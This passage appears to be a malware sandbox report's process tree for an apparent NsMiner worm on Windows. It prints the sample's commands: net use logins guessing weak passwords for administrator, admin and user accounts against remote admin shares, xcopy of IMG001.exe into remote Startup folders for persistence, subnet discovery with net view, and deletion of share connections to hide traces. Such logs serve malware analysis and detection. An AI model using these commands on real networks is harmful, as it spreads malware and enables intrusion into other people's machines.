C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3800
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:5620
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Location Discovery: System Language Discovery
PID:5816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4680
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2472
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:2404 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5952
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:1816 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3712
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2532
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:4060
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:1392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:2060 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:2708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:3956 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:356
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:5152
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\IMG001.exe" "6⤵PID:3352
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe"7⤵
- Enumerates system info in registry
PID:2700
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:3144
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4352
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1816
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"6⤵PID:5560
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"6⤵
- System Location Discovery: System Language Discovery
PID:4468
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2340
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"1"6⤵PID:4060
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"1"6⤵PID:428
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5520
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"6⤵PID:3960
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"6⤵PID:2360
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5728
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1805" /user:"1"6⤵PID:2552
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1805" /user:"1"6⤵
- System Location Discovery: System Language Discovery
PID:4996
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:1812
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"1"6⤵PID:3352
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"1"6⤵PID:200
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1692
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"10.127.0.1"6⤵PID:1948
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"10.127.0.1"6⤵PID:3244
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5160
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"10.127.0.1"6⤵
- System Location Discovery: System Language Discovery
PID:2616
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"10.127.0.1"6⤵PID:2060
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5076
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"10.127.0.1"6⤵PID:2264
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"10.127.0.1"6⤵PID:3216
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2100
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "10.127.0.1" /user:"10.127.0.1"6⤵PID:4884
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "10.127.0.1" /user:"10.127.0.1"6⤵PID:4484
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:724
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1805" /user:"10.127.0.1"6⤵PID:2000
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1805" /user:"10.127.0.1"6⤵PID:3612
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:3832
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"10.127.0.1"6⤵PID:4600
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"10.127.0.1"6⤵PID:3144
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:2700
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"administrator"6⤵PID:6064
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"administrator"6⤵PID:6020
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1412
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"administrator"6⤵PID:3244
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"administrator"6⤵PID:1848
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- Runs ping.exe
PID:2828
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"administrator"6⤵PID:5684
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"administrator"6⤵PID:5152
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:3956
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "administrator" /user:"administrator"6⤵PID:2512
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "administrator" /user:"administrator"6⤵PID:5344
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3724
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1805" /user:"administrator"6⤵
- System Location Discovery: System Language Discovery
PID:3184
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1805" /user:"administrator"6⤵PID:3516
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1624
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"administrator"6⤵PID:4884
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"administrator"6⤵PID:896
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5744
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"user"6⤵PID:3524
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"user"6⤵PID:5924
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2036
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"user"6⤵PID:5204
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"user"6⤵
- System Location Discovery: System Language Discovery
PID:3800
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:3412
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"user"6⤵PID:2284
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"user"6⤵PID:5608
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1688
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "user" /user:"user"6⤵PID:896
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "user" /user:"user"6⤵
- System Location Discovery: System Language Discovery
PID:5968
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4948
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1805" /user:"user"6⤵
- System Location Discovery: System Language Discovery
PID:5776
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1805" /user:"user"6⤵PID:4804
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5244
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"user"6⤵PID:5184
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"user"6⤵PID:1684
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2316
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"admin"6⤵
- System Location Discovery: System Language Discovery
PID:3752
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"admin"6⤵PID:3460
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5648
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"admin"6⤵PID:5428
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"admin"6⤵PID:3744
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:3612
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"admin"6⤵PID:3896
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"admin"6⤵PID:1520
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:1324
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "admin" /user:"admin"6⤵PID:5396
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "admin" /user:"admin"6⤵PID:5848
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2060
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1805" /user:"admin"6⤵PID:5632
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1805" /user:"admin"6⤵PID:5536
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵PID:6008
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"admin"6⤵PID:6088
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"admin"6⤵PID:5808
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3964
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "0" /user:"àäìèíèñòðàòîð"6⤵PID:6036
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "0" /user:"àäìèíèñòðàòîð"6⤵PID:5688
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5540
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"àäìèíèñòðàòîð"6⤵PID:5036
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"àäìèíèñòðàòîð"6⤵PID:1388
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5444
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"àäìèíèñòðàòîð"6⤵PID:5992
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"àäìèíèñòðàòîð"6⤵PID:976
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5732
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"6⤵
- System Location Discovery: System Language Discovery
PID:5428
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"6⤵PID:2608
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3064
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1805" /user:"àäìèíèñòðàòîð"6⤵PID:4440
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1805" /user:"àäìèíèñòðàòîð"6⤵PID:2520
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3712
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ """" /user:"àäìèíèñòðàòîð"6⤵PID:5460
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users """" /user:"àäìèíèñòðàòîð"6⤵
- System Location Discovery: System Language Discovery
PID:3756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "6⤵PID:1864
-
C:\Windows\SysWOW64\net.exenet view \\10.127.255.2557⤵
- Discovers systems in the same network
PID:684
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:4712
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:672
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:420 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:428
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5376
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:3452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:5308 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:3712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5928
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4596
-
-
